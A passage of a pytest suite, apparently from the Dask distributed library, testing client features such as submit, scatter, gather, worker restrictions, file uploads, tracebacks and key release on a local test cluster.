x = c.submit(sleep, 3)
await x
@pytest.mark.skip
@gen_cluster(client=True)
async def test_missing_data_heals(c, s, a, b):
a.validate = False
b.validate = False
x = c.submit(inc, 1)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
a.release_key(y.key)
if y.key in b.data:
del b.data[y.key]
b.release_key(y.key)
await asyncio.sleep(0)
w = c.submit(add, y, z)
result = await w
assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_missing_data(c, s, a, b):
a.validate = False
b.validate = False
x, y, z = c.map(inc, range(3))
await wait([x, y, z]) # everything computed
for f in [x, y]:
for w in [a, b]:
if f.key in w.data:
del w.data[f.key]
await asyncio.sleep(0)
w.release_key(f.key)
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_nested_missing_data(c, s, a, b):
a.validate = False
b.validate = False
w = c.submit(inc, 1)
x = c.submit(inc, w)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
await asyncio.sleep(0)
worker.release_key(datum.key)
result = await c.gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
async def test_tokenize_on_futures(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
c.futures[x.key].finish()
assert tok == tokenize(y)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_submit(c, s, a, b):
x = c.submit(inc, 1, workers={a.ip})
y = c.submit(inc, x, workers={b.ip})
await wait([x, y])
assert s.host_restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.host_restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port(c, s, a, b):
x = c.submit(inc, 1, workers={a.address})
y = c.submit(inc, x, workers={b.address})
await wait([x, y])
assert s.worker_restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.worker_restrictions[y.key] == {b.address}
assert y.key in b.data
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_map(c, s, a, b):
L = c.map(inc, range(5), workers={a.ip})
await wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.host_restrictions[x.key] == {a.ip}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_get(c, s, a, b):
dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
futures = c.get(dsk, ["y", "z"], workers=a.ip, sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert "y" in a.data
assert "z" in a.data
assert len(b.data) == 0
@gen_cluster(client=True)
async def test_restrictions_get_annotate(c, s, a, b):
x = 1
with dask.annotate(workers=a.address):
y = delayed(inc)(x)
with dask.annotate(workers=b.address):
z = delayed(inc)(y)
futures = c.get(z.__dask_graph__(), [y.key, z.key], sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert y.key in a.data
assert z.key in b.data
@gen_cluster(client=True)
async def dont_test_bad_restrictions_raise_exception(c, s, a, b):
z = c.submit(inc, 2, workers={"bad-address"})
try:
await z
assert False
except ValueError as e:
assert "bad-address" in str(e)
assert z.key in str(e)
@gen_cluster(client=True)
async def test_remove_worker(c, s, a, b):
L = c.map(inc, range(20))
await wait(L)
await b.close()
assert b.address not in s.workers
result = await c.gather(L)
assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_errors_dont_block(c, s, w):
L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
while not (L[0].status == L[2].status == "finished"):
await asyncio.sleep(0.01)
result = await c.gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(client=True)
async def test_submit_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = c.submit(assert_list, [1, 2, 3])
result = await x
assert result
x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = await x
assert result
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(assert_list, [x, y])
result = await z
assert result
@gen_cluster(client=True)
async def test_map_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = c.map(assert_list, [[1, 2, 3], [4]])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = await c.gather(L)
assert all(result)
@gen_cluster()
async def test_two_consecutive_clients_share_results(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(random.randint, 0, 1000, pure=True)
xx = await x
f = await Client(s.address, asynchronous=True)
y = f.submit(random.randint, 0, 1000, pure=True)
yy = await y
assert xx == yy
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_submit_then_get_with_Future(c, s, a, b):
x = c.submit(slowinc, 1)
dsk = {"y": (inc, x)}
result = await c.get(dsk, "y", sync=False)
assert result == 3
@gen_cluster(client=True)
async def test_aliases(c, s, a, b):
x = c.submit(inc, 1)
dsk = {"y": x}
result = await c.get(dsk, "y", sync=False)
assert result == 2
@gen_cluster(client=True)
async def test_aliases_2(c, s, a, b):
dsk_keys = [
({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
({"x": "y", "y": 1}, ["x"]),
({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
]
for dsk, keys in dsk_keys:
result = await c.gather(c.get(dsk, keys, sync=False))
assert list(result) == list(dask.get(dsk, keys))
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_scatter(c, s, a, b):
d = await c.scatter({"y": 20})
assert isinstance(d["y"], Future)
assert a.data.get("y") == 20 or b.data.get("y") == 20
y_who_has = s.get_who_has(keys=["y"])["y"]
assert a.address in y_who_has or b.address in y_who_has
assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
yy = await c.gather([d["y"]])
assert yy == [20]
[x] = await c.scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = await c.gather([x])
x_who_has = s.get_who_has(keys=[x.key])[x.key]
assert s.tasks[x.key].who_has
assert (
s.workers[a.address] in s.tasks[x.key].who_has
or s.workers[b.address] in s.tasks[x.key].who_has
)
assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = c.submit(add, x, d["y"]) # submit works on Future
result = await z
assert result == 10 + 20
result = await c.gather([z, x])
assert result == [30, 10]
@gen_cluster(client=True)
async def test_scatter_types(c, s, a, b):
d = await c.scatter({"x": 1})
assert isinstance(d, dict)
assert list(d) == ["x"]
for seq in [[1], (1,), {1}, frozenset([1])]:
L = await c.scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
s.validate_state()
seq = await c.scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_non_list(c, s, a, b):
x = await c.scatter(1)
assert isinstance(x, Future)
result = await x
assert result == 1
@gen_cluster(client=True)
async def test_scatter_tokenize_local(c, s, a, b):
from dask.base import normalize_token
class MyObj:
pass
L = []
@normalize_token.register(MyObj)
def f(x):
L.append(x)
return "x"
obj = MyObj()
future = await c.scatter(obj)
assert L and L[0] is obj
@gen_cluster(client=True)
async def test_scatter_singletons(c, s, a, b):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
future = await c.scatter(x)
result = await future
assert str(result) == str(x)
@gen_cluster(client=True)
async def test_scatter_typename(c, s, a, b):
future = await c.scatter(123)
assert future.key.startswith("int")
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
x = await c.scatter(123)
y = await c.scatter(123)
assert x.key == y.key
z = await c.scatter(123, hash=False)
assert z.key != y.key
@gen_cluster(client=True)
async def test_scatter_hash_2(c, s, a, b):
[a] = await c.scatter([1])
[b] = await c.scatter([1])
assert a.key == b.key
s.validate_state()
@gen_cluster(client=True)
async def test_get_releases_data(c, s, a, b):
await c.gather(c.get({"x": (inc, 1)}, ["x"], sync=False))
import gc
gc.collect()
while c.refcount["x"]:
await asyncio.sleep(0.01)
def test_current(s, a, b):
with Client(s["address"]) as c:
assert Client.current() is c
with pytest.raises(ValueError):
Client.current()
with Client(s["address"]) as c:
assert Client.current() is c
def test_global_clients(loop):
assert _get_global_client() is None
with pytest.raises(ValueError):
default_client()
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert _get_global_client() is c
assert default_client() is c
with Client(s["address"], loop=loop) as f:
assert _get_global_client() is f
assert default_client() is f
assert default_client(c) is c
assert default_client(f) is f
assert _get_global_client() is None
@gen_cluster(client=True)
async def test_exception_on_exception(c, s, a, b):
x = c.submit(lambda: 1 / 0)
y = c.submit(inc, x)
with pytest.raises(ZeroDivisionError):
await y
z = c.submit(inc, y)
with pytest.raises(ZeroDivisionError):
await z
@gen_cluster(client=True)
async def test_get_nbytes(c, s, a, b):
[x] = await c.scatter([1])
assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
y = c.submit(inc, x)
await y
assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_nbytes_determines_worker(c, s, a, b):
x = c.submit(identity, 1, workers=[a.ip])
y = c.submit(identity, tuple(range(100)), workers=[b.ip])
await c.gather([x, y])
z = c.submit(lambda x, y: None, x, y)
await z
assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
async def test_if_intermediates_clear_on_error(c, s, a, b):
x = delayed(div, pure=True)(1, 0)
y = delayed(div, pure=True)(1, 2)
z = delayed(add, pure=True)(x, y)
f = c.compute(z)
with pytest.raises(ZeroDivisionError):
await f
s.validate_state()
assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(
client=True, config={"distributed.scheduler.default-task-durations": {"f": "1ms"}}
)
async def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
np = pytest.importorskip("numpy")
lists = c.map(np.ones, [10000] * 10, pure=False)
sums = c.map(np.sum, lists)
total = c.submit(sum, sums)
def f(x, y):
return None
results = c.map(f, lists, [total] * 10)
await wait([total])
await wait(results)
assert (
sum(
s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
for l, r in zip(lists, results)
)
>= 9
)
@gen_cluster(client=True)
async def test_get_with_non_list_key(c, s, a, b):
dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
x = await c.get(dsk, ("x", 0), sync=False)
y = await c.get(dsk, 5, sync=False)
assert x == 2
assert y == 3
@gen_cluster(client=True)
async def test_get_with_error(c, s, a, b):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
await c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
c.get(dsk, "y")
@gen_cluster(client=True)
async def test_directed_scatter(c, s, a, b):
await c.scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
await c.scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
futures = c.scatter([1, 2, 3], workers=[b["address"]])
has_what = sync(loop, c.scheduler.has_what)
assert len(has_what[b["address"]]) == len(futures)
assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
async def test_scatter_direct(c, s, a, b):
future = await c.scatter(123, direct=True)
assert future.key in a.data or future.key in b.data
assert s.tasks[future.key].who_has
assert future.status == "finished"
result = await future
assert result == 123
assert not s.counters["op"].components[0]["scatter"]
result = await future
assert not s.counters["op"].components[0]["gather"]
result = await c.gather(future)
assert not s.counters["op"].components[0]["gather"]
@gen_cluster()
async def test_scatter_direct_2(s, a, b):
c = await Client(s.address, asynchronous=True, heartbeat_interval=10)
last = s.clients[c.id].last_seen
while s.clients[c.id].last_seen == last:
await asyncio.sleep(0.10)
await c.close()
@gen_cluster(client=True)
async def test_scatter_direct_numpy(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.ones(5)
future = await c.scatter(x, direct=True)
result = await future
assert np.allclose(x, result)
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
async def test_scatter_direct_broadcast(c, s, a, b):
future2 = await c.scatter(456, direct=True, broadcast=True)
assert future2.key in a.data
assert future2.key in b.data
assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
result = await future2
assert result == 456
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_balanced(c, s, *workers):
futures = await c.scatter([1, 2, 3], direct=True)
assert sorted(len(w.data) for w in workers) == [0, 1, 1, 1]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_broadcast_target(c, s, *workers):
futures = await c.scatter([123, 456], direct=True, workers=workers[0].address)
assert futures[0].key in workers[0].data
assert futures[1].key in workers[0].data
futures = await c.scatter(
[123, 456],
direct=True,
broadcast=True,
workers=[w.address for w in workers[:3]],
)
assert (
f.key in w.data and w.address in s.tasks[f.key].who_has
for f in futures
for w in workers[:3]
)
@gen_cluster(client=True, nthreads=[])
async def test_scatter_direct_empty(c, s):
with pytest.raises((ValueError, TimeoutError)):
await c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 5)
async def test_scatter_direct_spread_evenly(c, s, *workers):
futures = []
for i in range(10):
future = await c.scatter(i, direct=True)
futures.append(future)
assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
results = c.gather(futures, direct=direct)
assert results == [1, 2, 3]
delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
async def test_gather_direct(c, s, a, b):
futures = await c.scatter([1, 2, 3])
data = await c.gather(futures, direct=True)
assert data == [1, 2, 3]
@gen_cluster(client=True)
async def test_many_submits_spread_evenly(c, s, a, b):
L = [c.submit(inc, i) for i in range(10)]
await wait(L)
assert a.data and b.data
@gen_cluster(client=True)
async def test_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
tb = await x.traceback()
assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
async def test_get_traceback(c, s, a, b):
try:
await c.get({"x": (div, 1, 0)}, "x", sync=False)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
@gen_cluster(client=True)
async def test_gather_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await c.gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
def test_traceback_sync(c):
x = c.submit(div, 1, 0)
tb = x.traceback()
assert any(
"x / y" in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
y = c.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb)))
)
z = c.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(client=True)
async def test_upload_file(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", f"def f():\n return {value}") as fn:
await c.upload_file(fn)
x = c.submit(g, pure=False)
result = await x
assert result == value
@gen_cluster(client=True)
async def test_upload_file_refresh_delayed(c, s, a, b):
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", f"def f():\n return {value}") as fn:
await c.upload_file(fn)
sys.path.append(os.path.dirname(fn))
from myfile import f
b = delayed(f)()
bb = c.compute(b, sync=False)
result = await c.gather(bb)
assert result == value
@gen_cluster(client=True)
async def test_upload_file_no_extension(c, s, a, b):
with tmp_text("myfile", "") as fn:
await c.upload_file(fn)
@gen_cluster(client=True)
async def test_upload_file_zip(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
try:
for value in [123, 456]:
with tmp_text(
"myfile.py", f"def f():\n return {value}"
) as fn_my_file:
with zipfile.ZipFile("myfile.zip", "w") as z:
z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
await c.upload_file("myfile.zip")
x = c.submit(g, pure=False)
result = await x
assert result == value
finally:
if os.path.exists("myfile.zip"):
os.remove("myfile.zip")
@gen_cluster(client=True)
async def test_upload_file_egg(c, s, a, b):
def g():
import package_1
import package_2
return package_1.a, package_2.b
# c.upload_file tells each worker to
# - put this file in their local_directory
# - modify their sys.path to include it
# we don't care about the local_directory
# but we do care about restoring the path
with save_sys_modules():
for value in [123, 456]:
with tmpfile() as dirname:
os.mkdir(dirname)
with open(os.path.join(dirname, "setup.py"), "w") as f:
f.write("from setuptools import setup, find_packages\n")
f.write(
'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
value
)
)
# test a package with an underscore in the name
package_1 = os.path.join(dirname, "package_1")
os.mkdir(package_1)
with open(os.path.join(package_1, "__init__.py"), "w") as f:
f.write(f"a = {value}\n")
# test multiple top-level packages
package_2 = os.path.join(dirname, "package_2")
os.mkdir(package_2)
with open(os.path.join(package_2, "__init__.py"), "w") as f:
f.write(f"b = {value}\n")
# compile these into an egg
subprocess.check_call(
[sys.executable, "setup.py", "bdist_egg"], cwd=dirname
)
egg_root = os.path.join(dirname, "dist")
# first file ending with '.egg'
egg_name = [
fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
][0]
egg_path = os.path.join(egg_root, egg_name)
await c.upload_file(egg_path)
os.remove(egg_path)
x = c.submit(g, pure=False)
result = await x
assert result == (value, value)
@gen_cluster(client=True)
async def test_upload_large_file(c, s, a, b):
assert a.local_directory
assert b.local_directory
with tmp_text("myfile", "abc") as fn:
with tmp_text("myfile2", "def") as fn2:
await c._upload_large_file(fn, remote_filename="x")
await c._upload_large_file(fn2)
for w in [a, b]:
assert os.path.exists(os.path.join(w.local_directory, "x"))
assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
with open(os.path.join(w.local_directory, "x")) as f:
assert f.read() == "abc"
with open(os.path.join(w.local_directory, "myfile2")) as f:
assert f.read() == "def"
def test_upload_file_sync(c):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
c.upload_file(fn)
x = c.submit(g)
assert x.result() == 123
@gen_cluster(client=True)
async def test_upload_file_exception(c, s, a, b):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
await c.upload_file(fn)
def test_upload_file_exception_sync(c):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
c.upload_file(fn)
@gen_cluster(client=True, nthreads=[])
async def test_upload_file_new_worker(c, s):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
await c.upload_file(fn)
async with Worker(s.address):
x = await c.submit(g)
assert x == 123
@pytest.mark.skip
@gen_cluster()
async def test_multiple_clients(s, a, b):
a = await Client(s.address, asynchronous=True)
b = await Client(s.address, asynchronous=True)
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.client is a
assert y.client is b
xx = await x
yy = await y
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.client is a
zz = await z
assert zz == 5
await a.close()
await b.close()
@gen_cluster(client=True)
async def test_async_compute(c, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = c.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = await c.gather([yy, zz])
assert result == [2, 0]
assert isinstance(c.compute(y), Future)
assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
async def test_async_compute_with_scatter(c, s, a, b):
d = await c.scatter({("x", 1): 1, ("y", 1): 2})
x, y = d[("x", 1)], d[("y", 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = c.compute(z)
[result] = await c.gather([zz])
assert result == 2 + 3
def test_sync_compute(c):
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = c.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
async def test_remote_scatter_gather(c, s, a, b):
x, y, z = await c.scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(client=True)
async def test_remote_submit_on_Future(c, s, a, b):
x = c.submit(lambda x: x + 1, 1)
y = c.submit(lambda x: x + 1, x)
result = await y
assert result == 3
def test_start_is_idempotent(c):
c.start()
c.start()
c.start()
x = c.submit(inc, 1)
assert x.result() == 2
@gen_cluster(client=True)
async def test_client_with_scheduler(c, s, a, b):
assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y)
result = await x
assert result == 1 + 1
result = await z
assert result == 1 + 1 + 1 + 2
A, B, C = await c.scatter([1, 2, 3])
AA, BB, xx = await c.gather([A, B, x])
assert (AA, BB, xx) == (1, 2, 2)
result = await c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
assert result == 12
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_allow_restrictions(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[a.address]
x = c.submit(inc, 1, workers=a.ip)
await x
assert s.tasks[x.key].who_has == {aws}
assert not s.loose_restrictions
x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
await x
assert s.tasks[x.key].who_has == {aws}
assert x.key in s.loose_restrictions
L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has == {aws} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
await x
assert s.tasks[x.key].who_has
assert x.key in s.loose_restrictions
L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
c.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
c.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
with pytest.raises(TypeError):
c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
def test_bad_address():
with pytest.raises(OSError, match="connect"):
Client("123.123.123.123:1234", timeout=0.1)
with pytest.raises(OSError, match="connect"):
Client("127.0.0.1:1234", timeout=0.1)
def test_informative_error_on_cluster_type():
with pytest.raises(TypeError) as exc_info:
Client(LocalCluster)
assert "Scheduler address must be a string or a Cluster instance" in str(
exc_info.value
)
@gen_cluster(client=True)
async def test_long_error(c, s, a, b):
def bad(x):
raise ValueError("a" * 100000)
x = c.submit(bad, 10)
try:
await x
except ValueError as e:
assert len(str(e)) < 100000
tb = await x.traceback()
assert all(
len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
@gen_cluster(client=True)
async def test_map_on_futures_with_kwargs(c, s, a, b):
def f(x, y=10):
return x + y
futures = c.map(inc, range(10))
futures2 = c.map(f, futures, y=20)
results = await c.gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = c.submit(inc, 100)
future2 = c.submit(f, future, y=200)
result = await future2
assert result == 100 + 1 + 200
class BadlySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
@gen_cluster(client=True)
async def test_badly_serialized_input(c, s, a, b):
o = BadlySerializedObject()
future = c.submit(inc, o)
futures = c.map(inc, range(10))
L = await c.gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == "error"
with pytest.raises(Exception) as info:
await future
assert "hello!" in str(info.value)
@pytest.mark.skip
@gen_test()
async def test_badly_serialized_input_stderr(capsys, c):
o = BadlySerializedObject()
future = c.submit(inc, o)
while True:
sleep(0.01)
out, err = capsys.readouterr()
if "hello!" in err:
break
assert future.status == "error"
def test_repr(loop):
funcs = [str, repr, lambda x: x._repr_html_()]
with cluster(nworkers=3, worker_kwargs={"memory_limit": "2 GiB"}) as (s, [a, b, c]):
with Client(s["address"], loop=loop) as c:
for func in funcs:
text = func(c)
assert c.scheduler.address in text
assert "threads=3" in text or "Total threads: </strong>" in text
assert "6.00 GiB" in text
if "<table" not in text:
assert len(text) < 80
for func in funcs:
text = func(c)
assert "No scheduler connected" in text
@gen_cluster(client=True)
async def test_repr_async(c, s, a, b):
c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
async def test_repr_no_memory_limit(c, s, a, b):
c._repr_html_()
@gen_test()
async def test_repr_localcluster():
cluster = await LocalCluster(
processes=False, dashboard_address=":0", asynchronous=True
)
client = await Client(cluster, asynchronous=True)
try:
text = client._repr_html_()
assert cluster.scheduler.address in text
assert is_valid_xml(client._repr_html_())
finally:
await client.close()
await cluster.close()
@gen_cluster(client=True)
async def test_forget_simple(c, s, a, b):
x = c.submit(inc, 1, retries=2)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key not in s.tasks
assert z.key not in s.tasks
assert not s.tasks[y.key].dependents
s.client_releases_keys(keys=[y.key], client=c.id)
assert not s.tasks
@gen_cluster(client=True)
async def test_forget_complex(e, s, A, B):
a, b, c, d = await e.scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
await wait([a, b, c, d, ab, ac, cd, acab])
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
assert b.key not in s.tasks
while b.key in A.data or b.key in B.data:
await asyncio.sleep(0.01)
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
async def test_forget_in_flight(e, s, A, B):
delayed2 = partial(delayed, pure=True)
a, b, c, d = (delayed2(slowinc)(i) for i in range(4))
ab = delayed2(slowadd)(a, b, dask_key_name="ab")
cd = delayed2(slowadd)(c, d, dask_key_name="cd")
ac = delayed2(slowadd)(a, c, dask_key_name="ac")
acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")
x, y = e.compute([ac, acab])
s.validate_state()
for i in range(5):
await asyncio.sleep(0.01)
s.validate_state()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate_state()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
@gen_cluster(client=True)
async def test_forget_errors(c, s, a, b):
x = c.submit(div, 1, 0)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=c.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(c):
s = str(c)
r = repr(c)
assert c.scheduler.address in s
assert c.scheduler.address in r
assert str(2) in s # nworkers
assert "cores" in s or "threads" in s
@gen_cluster(client=True)
async def test_waiting_data(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
